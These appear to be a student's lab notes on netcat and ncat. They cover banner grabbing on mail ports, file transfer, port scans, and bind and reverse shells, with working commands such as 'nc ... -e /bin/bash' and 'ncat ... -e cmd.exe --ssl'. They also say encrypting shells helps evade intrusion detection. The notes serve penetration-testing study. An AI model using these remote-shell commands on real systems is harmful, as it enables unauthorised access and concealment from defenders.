NETCAT AND NCAT
Banner Grabbing - SMTP:
Let's see if we can get any interesting information from this machine or it's banners.
Syntax below is target IP then port number being targeted.
#nc -nv 10.11.25.139 25
The output of this command shows that the smtp port 25 is open and the smtp banner is displayed:
"220 localhost ESMTP is server is ready."
Since SMTP uses a clear text protocol, we can now interact with this service. Let's try typing HELP.
The server responds and provides the Mail server account name of 'Maiser' along with a list of recognised SMTP commands
Banner Grabbing - POP3:
Lets try connecting to port 110 next - pop3
#nc -nv 10.11.25.139 110
The output shows that the port is open and we get the pop3 service banner and a prompt to enter pop3 credentials:
"+OK <753110.63@localhost>, POP3 server ready"
We can continue using netcat to interact with the pop3 server.
Since we do not have the right username and password combination, the logon attempt fails.
Banner Grabbing - IMAP:
Let's try connecting to the IMAP port. TCP port 143.
#nc -nv 10.11.25.139 143
The output shows that the port is open and provides the banner. The banner output for imap in this example is more verbose as it provides the version in additional to the program.
"OK localhost IMAP4rev1 Mercury/32 v4.5 server ready"
Transferring a file with Netcat:
Netcat can also be used to transfer both text and binary files from one machine to another.
We will now upload a file to the windows machine from the kali box.
on the windows machine, we will setup a netcat listener as we did earlier although this time we will pipe any input in to a file called incoming.exe
C:\>nc -nvlp 4444 >incoming.exe
So now any incoming data on port 4444 will end up in the file incoming.exe
From the kali machine we will locate the wget.exe file and then upload it over netcat.
#nc -nv 10.11.25.139 4444
In this case we do not see any feedback from the windows server that the file upload has completed.
in order to verify that the upload did complete, we can test the incoming.exe file on the windows 7 machine and ensure that this file works just like a wget.exe file.
Netcat Bind Shell:
Bob on windows.
Alice on the kali machine.
Imagine Bob has a public IP address and is connected to the internet.
Alice's computer is located in a corporate network behind a firewall making her machine inaccessible and no routable from the internet.
Bob needs Alice to connect to his computer and take care of it for administration purposes. First Bob will setup up a listener that will allow cmd.exe to be executing, this require -e cmd.exe to be added to the standard nc listener. eg.
c:\>nc -lvp 4444 -e cmd.exe
After Bob has run the above command, anyone connecting to his IP on port 4444 will be prompted with a command prompt on his machine.
Alice now connects:
#nc -nv 10.11.25.139 4444
Alice now has an interactive windows shell on Bob's Machine.
Netcat Reverse Shell:
This is a more interesting scenario.
Now ALice needs help from Bob. Bob needs to connect to her Linux machine, behind the corporate firewall.
Alice is unable to accept incoming connections from Bob. ALice can make outbound connections which allows her to connect to Bob with a netcat session tied to a local shell. Once this conneciton is made, Bob will have access to her computer and will be able to execute commands.
Bob needs to setup a netcat listener and listen for incoming connections.
C:\> nc -lvp 4444
Alice can connect to Bob's listner
#nc -nv 10.11.25.139 4444 -e /bin/bash
Once the connection occurs, Bob will be able to execute linux commands in the windows command prompt.
So now we have a bash shell sent from Alice's Linux Machine behind the corporate firewall to Bob's Windows machine.
Netcat - ACTIVE INFORMATION GATHERING: Connect Scan
Completing a 3-way handshake indicates that the port is open in this technique.
eg: A simple Connect Scan between ports 3385 and 3389 on 10.11.1.13.
#nc -nvv -w 1 -z 10.11.1.13 3385-3395
Netcat - ACTIVE INFORMATION GATHERING: SYN Scan
SYN scanning is also known as half connect or stealth scanning.
Send SYN packets without completing the TCP handshake if the TCP port is open, a SYN/ACK should be sent back from the target machine. There is no need to send back the final ACK.
This used to be able bypass old and primitive firewalls as logging was limited to completed tcp sessions only. This is no longer true and will be detected.
Netcat - ACTIVE INFORMATION GATHERING: UDP Scan
Since The UDP protocol is stateless, it does not require a 3-way handshake. The mechanism behind UDP port scanning is different to TCP.
eg: A UDP scan for the host at 10.11.1.13 and a port range of 160-165.
#nc -unvv -w 1 -z 10.11.1.13 160-165
In the case that a port is closed, a destination unreachable icmp packet is returned. In the event that a port is open, no response at all is provided. Due to this, UDP scannning is often unreliable as firewalls and routers may drop icmp packets all together leading to false positives in or scans.
One of the drawbacks of using netcat for bind and reverse shells is the fact that it lacks encryption and that there is no way to limit access from incoming connections. Encryption of the bind or reverse shells will assist the pen tester by avoiding detection by Intrusion Detection Systems. Limiting access to the shells will ensure that other machine do not use these exploits.
** When possible tools like "Ncat" and "sbd" should be used instead of netcat.
Ncat has tonnes more features than netcat including ssl encryption and the ability to whitelist access to specific IPs.
NCAT: Bind Shell
Lets use Ncat to create a more secure bind shell between Bob and Alice.
Bob will use Ncat to setup an SSL encrypted bind shell on port 4444 and allow only Alice's IP to connect to it.
First copy ncat to the windows directory so that it is your path.
Bob sets up an ncat listener to allow only Alice's IP and to use ssl encryption.
C:\>ncat -lvp 4444 -e cmd.exe --allow 10.11.0.179 --ssl
Alice now uses ncat to connect to Bob's IP on port 4444 using SSL:
#ncat -v 10.11.25.139 4444 --ssl
Bob now has an encrypted shell back to Alice's computer. How do we know that our traffic is indeed no longer in clear text? Let's use Wireshark for this.
NCAT: Reverse Shell
I used what I had learned above to create a reverse shell on ssl with restricted access:
On Bob machine, I set up a listener:
C:\>ncat -lvp 4444 --ssl --allow 10.11.0.179
On Alice's machine I connect to Bob offering a bash shell.
#ncat -nv 10.11.25.139 4444 -e /bin/bash --ssl